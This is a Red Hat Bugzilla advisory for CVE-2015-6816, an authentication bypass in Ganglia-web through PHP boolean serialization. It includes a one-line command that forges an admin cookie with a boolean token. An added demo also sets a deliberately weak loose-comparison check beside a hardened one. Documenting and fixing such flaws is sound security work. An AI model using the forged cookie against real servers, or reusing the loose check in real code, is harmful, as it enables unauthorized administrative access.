Red Hat Bugzilla – Bug 1260562
CVE-2015-6816 ganglia: Bypassing Ganglia-web auth using boolean serialization
Last modified: 2015-11-08 13:24:14 EST
An auth bypass vulnerability was found in Ganglia-web. It's easy to bypass auth by using boolean serialization like this:
$ php -r "echo urlencode(serialize(array('user'=>'admin','group'=>'admin', 'token'=>true)));"
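Why a boolean token can pass a check, shown as an added example that is not Ganglia-web's code or part of the original report: it assumes the application unserializes the cookie and compares the token with loose `==`, which makes any non-empty expected token equal to `true`. `SECRET`, `make_token()`, `check_loose()`, `check_strict()` and the cookie layout are hypothetical; the strict check rejects the boolean token that the loose check accepts.

```php
<?php
// Constructed demo: SECRET, make_token() and the cookie layout are assumptions,
// not Ganglia-web's actual implementation.
const SECRET = 'constructed-demo-secret';

function make_token(string $user): string
{
    return hash_hmac('sha256', $user, SECRET);
}

// Weak form: unserialize() restores PHP types, and == converts the expected
// token string to bool when the supplied token is a boolean.
function check_loose(string $cookie): bool
{
    $data = unserialize($cookie);
    return is_array($data)
        && isset($data['user'], $data['token'])
        && make_token($data['user']) == $data['token'];
}

// Hardened form: no object instantiation, every field must be a string,
// and the token is compared in constant time with hash_equals().
function check_strict(string $cookie): bool
{
    $data = unserialize($cookie, ['allowed_classes' => false]);
    if (!is_array($data)) {
        return false;
    }
    foreach (['user', 'group', 'token'] as $key) {
        if (!isset($data[$key]) || !is_string($data[$key])) {
            return false;
        }
    }
    return hash_equals(make_token($data['user']), $data['token']);
}

// Constructed sample cookies: one with a real token, one with the boolean
// token value shown in the report.
$fields = ['user' => 'admin', 'group' => 'admin'];
$legit  = serialize($fields + ['token' => make_token('admin')]);
$forged = serialize($fields + ['token' => true]);

foreach (['legit' => $legit, 'forged' => $forged] as $name => $cookie) {
    printf("%-6s loose=%s strict=%s\n", $name,
        var_export(check_loose($cookie), true),
        var_export(check_strict($cookie), true));
}
```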
Created ganglia tracking bugs for this issue:
Affects: fedora-all [bug 1260563]
Affects: epel-all [bug 1260564]
ganglia-3.7.2-2.el7 has been pushed to the Fedora EPEL 7 stable repository. If problems still persist, please make note of it in this bug report.
ganglia-3.7.2-2.el6 has been pushed to the Fedora EPEL 6 stable repository. If problems still persist, please make note of it in this bug report.